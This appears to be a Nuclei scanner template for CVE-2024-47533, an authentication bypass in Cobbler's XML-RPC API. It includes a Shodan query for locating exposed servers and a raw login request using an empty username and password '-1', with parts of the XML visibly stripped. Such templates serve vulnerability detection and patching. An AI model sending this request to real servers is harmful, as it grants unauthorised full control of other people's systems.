id: CVE-2024-47533 info: name: Cobbler 'XML-RPC' - Authentication Bypass author: songyaeji severity: critical description: | Cobbler, a Linux installation server that allows for rapid setup of network installation environments, has an improper authentication vulnerability starting in version 3.0.0 and prior to versions 3.2.3 and 3.3.7. `utils.get_shared_secret()` always returns `-1`, which allows anyone to connect to cobbler XML-RPC as user `''` password `-1` and make any changes. This gives anyone with network access to a cobbler server full control of the server. Versions 3.2.3 and 3.3.7 fix the issue. impact: | Anyone with network access can connect to Cobbler XML-RPC with default credentials and make arbitrary changes, gaining full control. remediation: | Update Cobbler to version 3.2.3 or 3.3.7 or later. reference: - https://github.com/cobbler/cobbler/commit/32c5cada013dc8daa7320a8eda9932c2814742b0 - https://github.com/cobbler/cobbler/commit/e19717623c10b29e7466ed4ab23515a94beb2dda - https://github.com/cobbler/cobbler/security/advisories/GHSA-m26c-fcgh-cp6h classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-47533 cwe-id: CWE-287 epss-score: 0.03948 epss-percentile: 0.89325 metadata: verified: true max-request: 1 shodan-query: http.title:"Cobbler Web Interface" tags: cve,cve2024,cobbler,auth-bypass,unauth,xmlrpc,vuln http: - raw: - | POST /cobbler_api HTTP/1.1 Host: {{Hostname}} Content-Type: text/xml login -1 matchers-condition: and matchers: - type: word part: body words: - "" - "" condition: and - type: word part: content_type words: - "text/xml" - type: status status: - 200 - type: word part: body words: - "0" - "faultString" condition: or negative: true # digest: 4a0a00473045022100ba059bfd24b364a65d7217601fa75527930af6c7d680623e64c9ebb9610931f602206895be8a58bcdd602f9ed84b3585f5c5ae6100e19d695a342670e3d912439098:922c64590222798bb761d5b6d8e72950